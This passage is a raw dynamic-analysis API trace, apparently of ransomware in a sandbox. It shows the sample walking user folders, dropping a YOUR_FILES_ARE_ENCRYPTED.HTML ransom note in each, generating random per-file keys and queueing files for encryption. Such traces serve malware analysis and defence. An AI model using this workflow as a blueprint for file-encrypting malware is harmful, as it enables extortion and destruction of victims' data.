nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.312] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\desktop.ini") returned 77 [0170.313] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.313] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.313] lstrlenW (lpString=".ini") returned 4 [0170.313] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.313] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.313] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\fwlink[1]") returned 75 [0170.313] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.313] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.313] lstrlenW (lpString="") returned 0 [0170.313] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.313] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.313] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.313] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\dt1gie4d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.314] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.316] CloseHandle (hObject=0x604) returned 1 [0170.316] GetProcessHeap () returned 0x270000 [0170.317] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.317] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="F6GEI81Z", cAlternateFileName="")) returned 1 [0170.317] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned 65 [0170.317] 
GetProcessHeap () returned 0x270000 [0170.317] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.317] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" [0170.317] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*" [0170.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.317] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, 
ftCreationTime.dwLowDateTime=0xbcc097a0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc097a0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.318] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\desktop.ini") returned 77 [0170.318] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.318] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.318] lstrlenW (lpString=".ini") returned 4 [0170.318] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.318] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\fwlink[1]") returned 75 [0170.318] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.318] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.318] lstrlenW (lpString="") returned 0 [0170.318] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.318] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.318] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.318] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\f6gei81z\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.319] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.321] CloseHandle (hObject=0x604) returned 1 [0170.321] GetProcessHeap () returned 0x270000 [0170.321] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.322] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="GXO2H2PJ", cAlternateFileName="")) returned 1 [0170.322] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned 65 [0170.322] GetProcessHeap () returned 0x270000 [0170.322] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0170.322] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" [0170.322] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*" [0170.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0170.322] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\desktop.ini") returned 77 [0170.322] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.322] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.322] lstrlenW (lpString=".ini") returned 4 [0170.322] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0170.322] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\fwlink[1]") returned 75 [0170.322] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0170.322] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.322] lstrlenW (lpString="") returned 0 [0170.322] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0170.322] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0170.323] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.323] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0170.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\gxo2h2pj\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.323] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.325] CloseHandle (hObject=0x604) returned 1 [0170.325] GetProcessHeap () returned 0x270000 [0170.326] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.326] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, 
ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a520ff0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 1 [0170.326] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 66 [0170.326] lstrcmpW (lpString1="index.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.326] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0170.326] lstrlenW (lpString=".dat") returned 4 [0170.326] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0170.326] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x604 [0170.327] GetFileSizeEx (in: hFile=0x604, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=32768) returned 1 [0170.327] GetProcessHeap () returned 0x270000 [0170.327] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0170.329] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="14") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="39") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="93") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="F3") returned 2 [0170.329] wsprintfW (in: 
param_1=0x4ebd42e, param_2="%02X" | out: param_1="9C") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="86") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="15") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="A5") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="FE") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="2B") returned 2 [0170.329] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="8B") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="A3") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="E5") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="71") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="A0") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="45") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="88") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="21") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="3E") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="96") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="67") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="7C") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="D1") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="26") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="59") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="B2") returned 2 
[0170.330] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="4B") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="FD") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="7F") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="00") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="8F") returned 2 [0170.330] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="1A") returned 2 [0170.331] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" [0170.331] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.331] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0170.331] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xbcbe3640, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a520ff0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 0 [0170.331] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.331] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 
[0170.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0170.332] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0170.334] CloseHandle (hObject=0x5fc) returned 1 [0170.334] GetProcessHeap () returned 0x270000 [0170.335] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0170.335] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a11ed0d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0170.335] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer") returned 62 [0170.335] GetProcessHeap () returned 0x270000 [0170.335] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0170.335] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer") 
returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer" [0170.335] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*" [0170.335] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcbe3640, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a11ed0d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.336] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, 